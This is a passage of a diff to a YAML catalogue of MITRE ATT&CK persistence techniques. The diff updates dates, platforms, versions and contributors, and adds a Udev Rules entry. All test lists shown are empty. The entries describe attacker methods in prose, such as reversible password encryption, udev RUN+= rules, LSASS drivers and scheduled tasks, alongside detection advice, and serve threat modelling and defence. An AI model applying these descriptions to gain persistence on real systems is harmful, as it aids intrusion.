+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.005:
+    technique:
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -34605,6 +34967,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -34615,23 +34978,50 @@ persistence:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1546.016:
     technique:
-      modified: '2024-04-12T02:23:44.583Z'
+      modified: '2024-04-28T15:52:44.332Z'
       name: Installer Packages
       description: |-
         Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -34648,7 +35038,7 @@ persistence:
         phase_name: persistence
       x_mitre_contributors:
       - Brandon Dalton @PartyD0lphin
-      - Alexander Rodchenko
+      - Rodchenko Aleksandr
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -34707,7 +35097,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.004:
     technique:
@@ -34789,7 +35178,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.004
     atomic_tests: []
   T1543.002:
@@ -34904,12 +35292,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.002
     atomic_tests: []
   T1136:
     technique:
-      modified: '2024-01-31T20:46:43.215Z'
+      modified: '2024-10-15T15:53:21.895Z'
       name: Create Account
       description: |-
         Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
@@ -34932,16 +35319,15 @@ persistence:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Network
       - Containers
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -34968,7 +35354,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.013:
     technique:
@@ -35037,7 +35422,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.007:
     technique:
@@ -35073,7 +35457,7 @@ persistence:
         Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
 
         Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T23:46:56.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: Re-opened Applications'
       x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -35092,12 +35476,11 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.007
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -35147,12 +35530,11 @@ persistence:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1098.002:
     technique:
-      modified: '2024-01-03T15:46:06.706Z'
+      modified: '2024-10-15T15:37:25.303Z'
       name: 'Account Manipulation: Additional Email Delegate Permissions'
       description: "Adversaries may grant additional permission levels to maintain
         persistent access to an adversary-controlled email account. \n\nFor example,
@@ -35185,9 +35567,10 @@ persistence:
       x_mitre_contributors:
       - Microsoft Detection and Response Team (DART)
       - Mike Burns, Mandiant
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
       - Arad Inbar, Fidelis Security
+      - Nilesh Dherange (Gurucul)
+      - Naveen Vijayaraghavan
       x_mitre_deprecated: false
       x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
         permissions changes that may indicate excessively broad permissions being
@@ -35204,9 +35587,8 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Group: Group Modification'
       - 'Application Log: Application Log Content'
@@ -35252,12 +35634,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.002
     atomic_tests: []
   T1653:
     technique:
-      modified: '2023-09-30T21:28:45.038Z'
+      modified: '2024-10-16T20:11:40.334Z'
       name: Power Settings
       description: |-
         Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
@@ -35271,7 +35652,7 @@ persistence:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Juan Tapiador
       x_mitre_deprecated: false
       x_mitre_detection: "Command-line invocation of tools capable of modifying services
@@ -35330,7 +35711,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.001:
     technique:
@@ -35356,7 +35736,7 @@ persistence:
         url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
         description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
           18. Retrieved November 15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:03.153Z'
       name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
       description: "Adversaries may use Windows logon scripts automatically executed
         at logon initialization to establish persistence. Windows allows logon scripts
@@ -35382,13 +35762,11 @@ persistence:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1037.001
     atomic_tests: []
   T1137.002:
     technique:
-      modified: '2024-04-16T12:41:55.175Z'
+      modified: '2024-10-15T16:01:48.325Z'
       name: 'Office Application Startup: Office Test'
       description: |-
         Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
@@ -35412,8 +35790,8 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'Command: Command Execution'
@@ -35443,7 +35821,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1137.002
     atomic_tests: []
   T1547.008:
@@ -35486,7 +35863,7 @@ persistence:
         Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
 
         Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:34:43.405Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: LSASS Driver'
       x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -35511,12 +35888,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.008
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -35556,8 +35932,10 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -35565,13 +35943,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -35602,17 +35980,14 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -35675,7 +36050,7 @@ persistence:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -35709,8 +36084,8 @@ persistence:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -35719,6 +36094,10 @@ persistence:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -35731,12 +36110,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -35749,6 +36127,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -35785,17 +36164,17 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -35841,9 +36220,65 @@ persistence:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+    atomic_tests: []
+  T1546.017:
+    technique:
+      modified: '2024-11-11T19:05:38.708Z'
+      name: Udev Rules
+      description: |-
+        Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+        Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Eduardo González Hernández (@codexlynx)
+      - Eder Pérez Ignacio, @ch4ik0
+      - Wirapong Petshagun
+      - "@grahamhelton3"
+      - Ruben Groenewoud, Elastic
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+        in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+        specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+        2024) '
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+      created: '2024-09-26T17:02:09.888Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/017
+        external_id: T1546.017
+      - source_name: Ignacio Udev research 2024
+        description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+          persistence. Retrieved September 26, 2024.
+        url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+      - source_name: Elastic Linux Persistence 2024
+        description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+          -  A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+        url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+      - source_name: Reichert aon sedexp 2024
+        description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+          Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+        url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.007:
     technique:
@@ -35880,7 +36315,7 @@ persistence:
         Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.
 
         Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:09:17.363Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Netsh Helper DLL'
       x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -35904,51 +36339,11 @@ persistence:
       - SYSTEM
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.007
     atomic_tests: []
   T1505.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Carlos Borges, @huntingneo, CIP
-      - Lucas da Silva Pereira, @vulcanunsec, CIP
-      - Kaspersky
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
-      type: attack-pattern
-      created: '2019-12-12T14:59:58.168Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1505.001
-        url: https://attack.mitre.org/techniques/T1505/001
-      - source_name: NetSPI Startup Stored Procedures
-        url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
-        description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
-          SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.'
-      - source_name: Kaspersky MSSQL Aug 2019
-        url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
-        description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
-          attack on Microsoft SQL Server. Retrieved September 4, 2019.'
-      - source_name: Microsoft xp_cmdshell 2017
-        url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
-        description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
-          September 9, 2019.
-      - source_name: Microsoft CLR Integration 2017
-        url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
-        description: Microsoft. (2017, June 19). Common Language Runtime Integration.
-          Retrieved July 8, 2019.
-      - source_name: NetSPI SQL Server CLR
-        url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/
-        description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
-          Retrieved July 8, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-15T16:05:24.007Z'
       name: SQL Stored Procedures
       description: "Adversaries may abuse SQL stored procedures to establish persistent
         access to systems. SQL Stored Procedures are code that can be saved and reused
@@ -35971,20 +36366,57 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Carlos Borges, @huntingneo, CIP
+      - Lucas da Silva Pereira, @vulcanunsec, CIP
+      - Kaspersky
+      x_mitre_deprecated: false
       x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
         NetSPI Startup Stored Procedures) Consider enabling audit features that can
         log malicious startup activities.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
+      created: '2019-12-12T14:59:58.168Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1505/001
+        external_id: T1505.001
+      - source_name: Microsoft CLR Integration 2017
+        description: Microsoft. (2017, June 19). Common Language Runtime Integration.
+          Retrieved July 8, 2019.
+        url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
+      - source_name: Microsoft xp_cmdshell 2017
+        description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
+          September 9, 2019.
+        url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
+      - source_name: Kaspersky MSSQL Aug 2019
+        description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
+          attack on Microsoft SQL Server. Retrieved September 4, 2019.'
+        url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
+      - source_name: NetSPI Startup Stored Procedures
